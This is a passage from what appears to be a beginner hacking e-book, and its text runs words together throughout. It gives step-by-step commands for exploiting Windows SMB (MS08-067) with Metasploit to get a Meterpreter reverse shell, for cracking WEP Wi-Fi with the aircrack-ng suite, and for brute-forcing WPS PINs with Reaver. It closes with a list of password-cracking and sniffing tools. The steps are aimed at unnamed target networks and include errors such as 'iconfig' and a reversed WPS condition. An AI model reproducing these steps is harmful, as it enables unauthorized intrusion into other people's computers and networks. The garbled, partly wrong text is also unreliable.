Linux.Itwillperformanattackonthenetwork.Youcanstartitupbytypingin
“msfconsole”asacommand.Thismaytakeafewminutes,sobepatient.
3. OnceMetasploitstartsup,youcantypeinsomecommandsthatwillprogressthe
hack.Heretheyareinorder:
“usewindows/smb/ms08_067_netapi”
“setPAYLOADwindows/meterpreter/reverse_tcp”
“setLHOST(yourIPaddress)”[YoumightnotknowwhatyourIPaddressis.Youcan
findoutbyjustopeningupanewterminalandtypinginthecommand“iconfig”.You’ll
seeyourIPaddressintheoutput.]
“setLPORT4444”
“setRHOST(theIPofthetargetnetwork)”
“setRPORT445”
“exploit”
Oneyoudoallthat,youshouldconnect.Ifyouaren’tsurewhattodoorwhatcommands
areavailabletoyou,justtypein“help”andalistofcommandswillbedisplayed.
1. Nowyouarein.You’vesuccessfullyhackedthecomputer,andyoucancheckfor
networkweaknessesorwhateverelseyouneedto.
Thereisgoodachancethatthisexploitwon’twork.Ifthetargetnetworkhasblockedport
445,thenyouwillneedtouseadifferenttactic.Also,somenewerversionsofWindows
willautomaticallyblockthisexploit.That’sokay,becausewehavesomemoremethodsof
hackingforyoutouse.
GeneralWEPHack
Thisnexthackisgoingtobemoreusefulforcurrentoperatingsystemsandnetworks.
Herewego:
1.Determinethenameofthewirelessadapter.Itispossiblethatthetargetcomputerwill
havemultiplenetworks.Ifthatisthecase,thenyouwillhavetoknowofthenameofthe
oneyouwanttoscan.Youarelookingforonethatsays“wlan”.Ifitsays“eth”for
Ethernetor“lo”forloopback,thenitwon’tbetheonewearelookingfor.Toseeallthe
adaptersthecomputerhas,typein“ifconfig”usingaterminal.Justtakenoteofthewlan
adapters.
2.Turnonmonitormode.Youcandothatbyusingthe“airmon-ngstartwlan0”command.
The“0”inthiscommandstandsforthenetworkyouwanttohackinto.Justsetthe
numberofthenetworkofyourchoiceinplaceofthat“0”.Typinginthiscommandwill
createavirtualconsolewhichisknownasamonitor.Itmaybecalled“mon”onyour
display.
IfyouareusingthelatestversionofKaliLinux,youmayseeadifferentnameforthe
monitorthanjust“mon”.Itcouldbe“mon0”or“wlan0mon”.Also,theairmon-ng
commandmaynotworkproperlyforyou.Ifthathappens,tryusingairmon-ngcheckkill.
Thiscommandlookslikethis:“airmon-ng<check|checkkill>”.
3.Youcanbegincapturingpackets.Thissimplymeansyouareinterceptingpiecesofdata
thataremovingacrossthenetworkconnection.Youcanusethe“airodump-ng”command
tobeginthecapturingprocess.Thiswilltakedatafromthepacketsthataremoving
throughtheair.Whenyoudothat,youwillseethenameofthetargetnetwork.
4.Fromthere,youcanstorethepacketsyoucaptureinafile.Dothisbyusingthe
“airodump”command.Thefullcommandyouwillusewilllooklikethis:“airodump-ng
mon0(plusthenameofthefileyouwanttocapture)”.Inthisexample,the“0”in“mon0”
isthenameofthenetwork.Sothenumberyouusemayvaryfromtheexamplegiven.
Youcanfindthepacketsyoucapturedinfilesthatlooklikethis:“(nameofthefile).cap”.
Youcan’tdothisrightawaythough.Youhavetowaituntilthereisenoughdataavailable.
1. TheWi-Fiiscracked.Atthispoint,youcanjusttypeinthecommand“aircrack-
ng”inordertodeterminethepassword.Remember,thistakesafewseconds,so
don’texpectinstantresultseverytime.Thiscommandneedstobeperformedina
newterminal.
2. TheprogrammayaskyouwhichWi-Fiyouwanttohackinto,butonlyifthereis
morethanonetochoosefrom.Youshouldgetinprettyfast,ifthepasswordis
weak.Forverystrongpasswords,youwillneedmorepackets.Theprogramis
goingtotryagainforitselfonceyouhave15,000packets,andifitis
unsuccessful,itwillkeeptryingateachnew5,000packetmilestone.
H
9
HACKINGWAPANDWAP2
ackingintoaWEPnetworkisprettyeasy.Thesecurityjustisn’tthattight,aswehave
previouslydiscussed.TohackintoaWAPorWAP2networkwilltakesomeextraeffort.
YoumightnotevenbeabletofindawayinusingKaliLinux.Abruteforceattackcould
takeaslongasseveralyears.Itdependsonthelengthofthepasswordandvariousother
factorsthatcreatesecurityforthenetwork.
TheproblemwithWPAtechisthatitcanbereallyhardtoconfigure.Tomakeiteasier,
WPSisaddedtocomplementWPA,butitdoescomewithanexploitablehole,and
programslikeReaverareexcellentatgettingthroughthathole.Theattackcanstilltake
severalhourstocomplete,butitisbetterthannotbeingabletogetthroughforyears.
WPSsendsan8-digitpintotheclient.Thesepinsonlycontainnumbers,sothereisa
limitednumberofguessesitwouldtaketocrackit.Still,withallthepossiblechoices,
tryingeachguesscantakeaverylongtime.WPAusescharacters,numbersandletters,so
guessingthepasswordcanbeinfinitelytougher.InWPS,therewillbeaslightdelayin
waitingfortheAPstorespond.Youwillprobablyonlybeabletogetinafewkeysper
second.Evenatthatspeed,itcanstilltakeyearstogetin,butthankfullytherearesome
weaknessestoexploit.
Weknowthatthe8
th
digitisalwaysachecksumofallthepreviousdigits.Thiscutsdown
thepossibilitiesconsiderably,butitwouldstilltakefartoolongtomakeitworthour
while.Wecanalsobreakdownthepinnumberintotwoseparateparts,whichmakesthe
workgotwiceasfast.Whatthisboilsdowntois11,000guesses,thoughoddsarewe
won’thavetoexhaustthemallbeforewefindtheanswer.Thismeansitshouldtakeabout
threehourstogothrougheveryguess,soyouarelookingatsomewherelessthanthree
hoursforthehack.Ifyouaretryingkeysslowly,though,itcantakemuchlonger.
Toperformtheattack,youwon’tneedtodoalotofcomplicatedwork.Ifyouhave
everythinginplace,thenyoucansimplyputinthecommand:
“reaver-i(interface-name)-b(BSSIDofyourtarget)
IfyouknowhowtohackaWEP,thenthisisbasicallythesameprocess.Weareworking
withReaverthistime,whichmakesthingseasierforyou,butitisstillharderoverall,
sinceyouarehackingintoaWPAorWPA2insteadofthemuchsimplerWEP.
1. StartupKaliLinux,thenbeginmonitormode.Thecommandforthatis:“airmon-
ngstartwlan0”.Likewiththelasthackweshowedyou,the“0”representsthe
networkname“whichisanumber).Onceyouknowthatname,substituteour“0”
forthecorrectnumber.
2. YouwillneedtheBBSSIDnumberofthenetworkyouaregoingtohackinto.
3. IfWPSisenabled,thenthishackwon’twork.IfyouwanttocheckWPS
activation,thenusethe“wash”commandor“airodump-ng”Usingwashispretty
easysinceitisdesignedspecificallyforthispurpose.
4. Thewashcommandgoeslikethis:“wash-imon0”.Remembertosubstitutethat
“0”.Thiswillalsostartupyoursysteminmonitormode.Ifyouseeanynetworks
afteryouhaveusedwash,thenWPSisenabledandyouwilllikelyhavetogive
up.
5. TheBSSIDnumberwillneedtobecombinedwithReaverforyournext
command.Thisis“reaver-imon0-b(BSSIDnumber).Reaverhasmore
advancedoptionsyoucanuse,andyoumaywanttomakeuseofthemtoincrease
yourhack’sefficiency.The-vwoption,forexample,makesyourtoolmore
verbose,tellingyouwhatishappeningrightonyourterminal.Soifyouare
experiencedathackingandusingReaver,thenthisisaninvaluableasset.Italso
helpsyousortthroughproblemsastheyhappen.Ifyouaregoingtousethistool,
justtypeinthecommand“reaver-imon0-b(BSSIDnumber)-vv
6. Nowyou’rein.Ifyouarehavinganytroubleortheprocessistakingfarlonger
thanitshould,thenyoumayneedtokillsomeprocesses.Thiswillfreeupsome
memoryforyoutouse.
Ifyouneedmoreinformationpleasechecktheadditionalresourcessectionofthisbook.
H
O
10
ADDITIONALRESOURCES
erearesomehackingsoftwaretoolsyoucanusetomakeyourlifealittlebiteasier.
It’sbesttostartoutwithwhatwascoveredearlierinthisbook.Then,onceyouare
comfortable,moveontotestsomeoftheseout.
Aircrack
Thisranksamongthemostpopularpasswordcrackersoutthere.Itcomeswithan
installationtutorial,soitshouldbeeasyenoughtouse.ItperformsaWEPattacksomake
surethatyouareusingthissoftwarefortherightkindofnetwork.Youshouldalsoensure
thatthewirelesscardcaninjectdatapackets.Ifitcan’t,thistoolwon’tbemuchhelpto
you.YoucanfindAircrackright
.
Airjack
Youwillbeexploitingman-in-the-middleflawswiththistool.It’sapacketinjection
programthatisavailableright
http://sourceforge.net/projects/airjack/
nlinehashcrack.com
Usingadictionaryattacksguessespasswordsforyouautomatically.ItworksonWPA
networks,andyoucanfinditright
.
http://www.onlinehashcrack.com
CommViewforWi-Fi
Thisprotocolanalysistoolalsoperformswirelessmonitoring.Itcandecodepacketsfrom
bothWEPandWPAnetworks.IfyouwanttokeeptrackofWi-Fitrafficsoyouknow
exactlywhoisusingyournetwork,thenthisisagreattoolforyou.You’llbeabletogetit
.
http://www.tamos.com/products/commwifi/
inSSIDer
Thisonewillcostyou,butitisanaward-winningscanner.Itworksonmostversionsof
WindowsaswellasOSX.ItisusedtosniffoutnetworkLANs,andyoucanfinditfor
about$20
.
OmniPeek
OmniPeekonlyworksonWindowsOS.Itisanetworkanalyzerthatcapturestrafficfrom
thenetwork.Youcanfindthisexcellenttroubleshootingtool
.
http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer
WireShark
LiketheinSSIDer,theWireSharkisgreatforanalyzingnetworkprotocols.Youcancheck
networktrafficwithit,butithelpstohaveadecentunderstandingofhownetwork
protocolworks.You’llfindthisone
WepAttack
ThisLinuxtoolisopensource,anditisgreatforbreakingkeysfrom802.11WEP
networks.YouwillneedaWLANcardforittowork,anditusesafairlystandardbut
somewhatslowdictionaryattack.Youcanfindit
http://wepattack.sourceforge.net/
Themajorityoftheseareavailableforfreeandareupdatedregularly.Soyoushouldnot
haveanyproblemdownloadingthemandtestingthemout.Youdefinitelywanttolook
intothefreetoolstofirsttoseeifthatcandowhatyouneedbeforeyoulookatpaidones.
T
hankyouforreading:Clickortouchtheimageandletusknowifyoulikeourbook!